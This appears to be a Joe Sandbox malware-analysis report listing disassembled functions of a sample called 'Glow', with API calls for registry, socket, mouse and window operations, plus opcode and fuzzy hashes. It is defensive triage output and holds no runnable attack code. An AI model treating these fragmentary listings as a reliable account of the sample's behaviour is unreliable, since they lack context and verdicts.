Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: aa3957a1f2f3861f04bf8ac58109b01873a2aa70212bbf536557c2575b97cd65
Instruction ID: c53e5372f920e7b894bebe4c08a4be50f9e05bb313987865a83e5ab3ded78360
Opcode Fuzzy Hash: aa3957a1f2f3861f04bf8ac58109b01873a2aa70212bbf536557c2575b97cd65
Instruction Fuzzy Hash: DF21927150034EDBDB318F68DC04AAA77E8BF55720F204A29FEA1E72D1DB709980DB50

Function 00414B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00387873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003878B1
Part of subcall function 00387873: GetStockObject.GDI32(00000011), ref: 003878C5
Part of subcall function 00387873: SendMessageW.USER32(00000000,00000030,00000000), ref: 003878CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00414BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00414BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00414BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00414BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00414BE3

Strings

Msctls_Progress32, xrefs: 00414B81

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 8518e7264138458f7eadfc1a3d56309b6e707b7c9cccb874403c31a8b6fa4b1b
Instruction ID: 221d62a104e0769774257ccecd9b6845bc65bca2a9dca9cb263d4277b4eec761
Opcode Fuzzy Hash: 8518e7264138458f7eadfc1a3d56309b6e707b7c9cccb874403c31a8b6fa4b1b
Instruction Fuzzy Hash: 5A11E6B114021DBEEF119FA4CC81EEB7F5DEF08398F004111B608A2090CB75DC61DBA4

Function 003BDB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003BDB23: _free.LIBCMT ref: 003BDB4C

_free.LIBCMT ref: 003BDBAD

Part of subcall function 003B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4), ref: 003B2D4E
Part of subcall function 003B2D38: GetLastError.KERNEL32(00451DC4,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4,00451DC4), ref: 003B2D60

_free.LIBCMT ref: 003BDBB8
_free.LIBCMT ref: 003BDBC3
_free.LIBCMT ref: 003BDC17
_free.LIBCMT ref: 003BDC22
_free.LIBCMT ref: 003BDC2D
_free.LIBCMT ref: 003BDC38

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: 69b3349e357445cff412dbc1884be7ca96e16c441ec54551a6d357728b4be9a0
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 1A111F73A41B04AAD522FBB0CC07FCBBBDC9F14704F414D1DB3A9AE952EA75B6048690

Function 003E6078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 003E608D
_memcmp.LIBVCRUNTIME ref: 003E60AB
_memcmp.LIBVCRUNTIME ref: 003E60BE
_memcmp.LIBVCRUNTIME ref: 003E60D6
_memcmp.LIBVCRUNTIME ref: 003E60EE

Strings

j`>, xrefs: 003E609B

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _memcmp
String ID: j`>
API String ID: 2931989736-513663464
Opcode ID: 7cc94086968e3dfe4c62eb13cf41af05ff436d0e82736395947047b86200f999
Instruction ID: 52218e7ca503dab931d193b58eb6f47c8ab6bfa09c906a183ee18f9577cdab75
Opcode Fuzzy Hash: 7cc94086968e3dfe4c62eb13cf41af05ff436d0e82736395947047b86200f999
Instruction Fuzzy Hash: 4C01D2F17083757B961656225C43FAB735DDE613D8F110121FD059A282E732ED10C2A4

Function 003EE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003EE328
LoadStringW.USER32(00000000), ref: 003EE32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003EE345
LoadStringW.USER32(00000000), ref: 003EE34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003EE390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 003EE36D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: ad3b2a29363e977d930cd3fbe810930ccefdbed7d51759389ff1ec65b0b9e899
Instruction ID: 0f342e1217a70d1bc32d90904ba955e1388574bfe19d60ea829c67260672ea78
Opcode Fuzzy Hash: ad3b2a29363e977d930cd3fbe810930ccefdbed7d51759389ff1ec65b0b9e899
Instruction Fuzzy Hash: 650136F6D003187FE71197A49D89EE7776CDB08300F0185A2B746E6041E6749E844B79

Function 003F1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 003F1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 003F1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 003F1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003F1350
CloseHandle.KERNEL32(00000000), ref: 003F135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 003F136F
LeaveCriticalSection.KERNEL32(00000000), ref: 003F1376

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 503f01ce88a0117df8d1c91d7811c8e0ad8bdefc09d1e63c07005c68606a155a
Instruction ID: 498611af2e476f5071c703ea1ff28945c4f7443e030c4f70d271504151c68ed7
Opcode Fuzzy Hash: 503f01ce88a0117df8d1c91d7811c8e0ad8bdefc09d1e63c07005c68606a155a
Instruction Fuzzy Hash: C6F0ECB2846616FBD7421B54EE49BD6BB39FF04302F405131F611928A0C7749571DF94

Function 004026BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0040281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0040283E
WSAGetLastError.WSOCK32 ref: 0040284F
htons.WSOCK32(?,?,?,?,?), ref: 00402938
inet_ntoa.WSOCK32(?), ref: 004028E9

Part of subcall function 003E433E: _strlen.LIBCMT ref: 003E4348

Part of subcall function 00403C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,003FF669), ref: 00403C9D

_strlen.LIBCMT ref: 00402992

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 16a21606c99fe5900779dff96903b6fd513d1da91165bc3c35abe4f2cc06ad34
Instruction ID: 703f5613c6cf0e3b3e0060df649e4f8c7d6de98b27a26cb02854e7334e2b61d8
Opcode Fuzzy Hash: 16a21606c99fe5900779dff96903b6fd513d1da91165bc3c35abe4f2cc06ad34
Instruction Fuzzy Hash: 23B10171600300AFD321EF24C889E2AB7A5AF84318F54859DF4566F3E2DB75ED46CB91

Function 003B0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 003B042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B0446
__allrem.LIBCMT ref: 003B045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B047B
__allrem.LIBCMT ref: 003B0492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B04B0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: 38174388120e7c39f18c2b0e8df0b67538900cfd2af7c8103bda4c51781a0067
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 06810A756007099BD72A9E69CC45BEBB3E8AF44328F15462AF715DBE81EB70DD008B50

Function 003B6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003A8649,003A8649,?,?,?,003B67C2,00000001,00000001,8BE85006), ref: 003B65CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003B67C2,00000001,00000001,8BE85006,?,?,?), ref: 003B6651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003B674B
__freea.LIBCMT ref: 003B6758

Part of subcall function 003B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,003A6A79,?,0000015D,?,?,?,?,003A85B0,000000FF,00000000,?,?), ref: 003B3BC5

__freea.LIBCMT ref: 003B6761
__freea.LIBCMT ref: 003B6786

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 290289176670c23fd69733608b0a5f929c05260a2ea9e651ca72a1e6030c71d3
Instruction ID: 13f32d386d978f193b8398cbb9d1f9a76a1e4e4f0bd37fa93999e6775ac9c54a
Opcode Fuzzy Hash: 290289176670c23fd69733608b0a5f929c05260a2ea9e651ca72a1e6030c71d3
Instruction Fuzzy Hash: 8C51E372610216ABDB268E64CC83EFB77A9EB4071CB154669FE04DA541EF38DC5086A0

Function 0040C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 0040D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D451
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4C8
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040C785
RegCloseKey.ADVAPI32(00000000), ref: 0040C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0040C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040C853
RegCloseKey.ADVAPI32(?), ref: 0040C85F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 8278c41a87765aadba9ac13120f717e9ec267b450f8ac3f6a887df6550ca14fa
Instruction ID: a08a1ca9e7684bb0df0e86980e947c5dec79255f3e3fc74d40aec5d9958f7503
Opcode Fuzzy Hash: 8278c41a87765aadba9ac13120f717e9ec267b450f8ac3f6a887df6550ca14fa
Instruction Fuzzy Hash: AD818B71108341EFC715EF24C884E2ABBE5BF84308F1489ADF4555B2A2DB35ED06CB96

Function 003E009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 003E00A9
SysAllocString.OLEAUT32(00000000), ref: 003E0150
VariantCopy.OLEAUT32(003E0354,00000000), ref: 003E0179
VariantClear.OLEAUT32(003E0354), ref: 003E019D
VariantCopy.OLEAUT32(003E0354,00000000), ref: 003E01A1
VariantClear.OLEAUT32(?), ref: 003E01AB

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: f8131512a550a7b94c3aadd627bbc12e0302a79d9693b5aaebab43d7acbee337
Instruction ID: 72121468f907ebd871d5f2b8012ffbcd9d53b77dac32a7ee80cef9c9841c3d38
Opcode Fuzzy Hash: f8131512a550a7b94c3aadd627bbc12e0302a79d9693b5aaebab43d7acbee337
Instruction Fuzzy Hash: 47513B75500370E6CF2AAF66D889B69B3E8EF55310F148547E906DF2D6DBB08C80CB55

Function 003F9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

GetOpenFileNameW.COMDLG32(00000058), ref: 003F9F2A
_wcslen.LIBCMT ref: 003F9F4B
_wcslen.LIBCMT ref: 003F9F72
GetSaveFileNameW.COMDLG32(00000058), ref: 003F9FCA

Strings

X, xrefs: 003F9E57

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 0fdc4d8b7ee6ca53ef99ce78868cadf50cb8080f74b4ba070e5efe5157979272
Instruction ID: acfe0936340ec98216f48c2b312d39341b7ce834db8623e4325d14311f37e90b
Opcode Fuzzy Hash: 0fdc4d8b7ee6ca53ef99ce78868cadf50cb8080f74b4ba070e5efe5157979272
Instruction Fuzzy Hash: AFE191316043419FC726EF24C881B6AB7E5FF85314F1589ADF9898B2A2DB31DD05CB92

Function 003F6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 003F6F21
CoInitialize.OLE32(00000000), ref: 003F707E
CoCreateInstance.OLE32(00420CC4,00000000,00000001,00420B34,?), ref: 003F7095
CoUninitialize.OLE32 ref: 003F7319

Strings

.lnk, xrefs: 003F6EFF, 003F6F69, 003F7025

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: c6bf202c441d61ce704fdccb83ce99780bf8c6b0e58eb10ea7886e60cc4c374f
Instruction ID: 895f6b35c2c7b9a44f1fa3086af798be9a93f6494abeca840dc6f8b74bd65b29
Opcode Fuzzy Hash: c6bf202c441d61ce704fdccb83ce99780bf8c6b0e58eb10ea7886e60cc4c374f
Instruction Fuzzy Hash: 81D13871608305AFC305EF24C881A6BB7E8FF98704F50496DF5958B2A2DB71ED45CB92

Function 003F1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 003F11B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 003F11EE
EnterCriticalSection.KERNEL32(?), ref: 003F120A
LeaveCriticalSection.KERNEL32(?), ref: 003F1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003F129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 003F12C8

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 844077d2044efc72202dafa88ba5e7de01b6b9663f51382193aa83c2a42b3a71
Instruction ID: 82996d161790f8381e64a88a745198e42f28dc5b53ff38649d2de767fd00d36c
Opcode Fuzzy Hash: 844077d2044efc72202dafa88ba5e7de01b6b9663f51382193aa83c2a42b3a71
Instruction Fuzzy Hash: CE415C75A00205EFDF069F94DCC5AAAB7B8FF45310F1480A5EE009E296DB30DE55DBA4

Function 00418C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,003DFBEF,00000000,?,?,00000000,?,003C39E2,00000004,00000000,00000000), ref: 00418CA7
EnableWindow.USER32(?,00000000), ref: 00418CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00418D2C
ShowWindow.USER32(?,00000004), ref: 00418D40
EnableWindow.USER32(?,00000001), ref: 00418D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00418D8A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ec2ca9fe73fe8eed6aecab95d745ea71f83285f41149f1488fe2d3b597631e92
Instruction ID: 1a25b2416ba57559cd644cae104684145861fd767673cdffa7f496958b1ca4a3
Opcode Fuzzy Hash: ec2ca9fe73fe8eed6aecab95d745ea71f83285f41149f1488fe2d3b597631e92
Instruction Fuzzy Hash: 6C419370701344AFDB25DF24D989BE27BF1FB46305F1841AEE5084B3A2DB75A885CB98

Function 00402D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00402D45

Part of subcall function 003FEF33: GetWindowRect.USER32(?,?), ref: 003FEF4B

GetDesktopWindow.USER32 ref: 00402D6F
GetWindowRect.USER32(00000000), ref: 00402D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00402DB2
GetCursorPos.USER32(?), ref: 00402DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00402E3C

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: ca19caf7831d2138d0d60fe9ac0a3ac616fcc020e5623dd65943570fbf539e47
Instruction ID: 337c0ea3ff8ba1c2dc8d4d64686023f8d9e3222f17e626220d52a5b459a09e13
Opcode Fuzzy Hash: ca19caf7831d2138d0d60fe9ac0a3ac616fcc020e5623dd65943570fbf539e47
Instruction Fuzzy Hash: CF31CF72905315AFC720DF14C849B9BB7A9FF84314F00092AF999A72C1DB74E9098B96

Function 003E55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 003E55F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003E5616
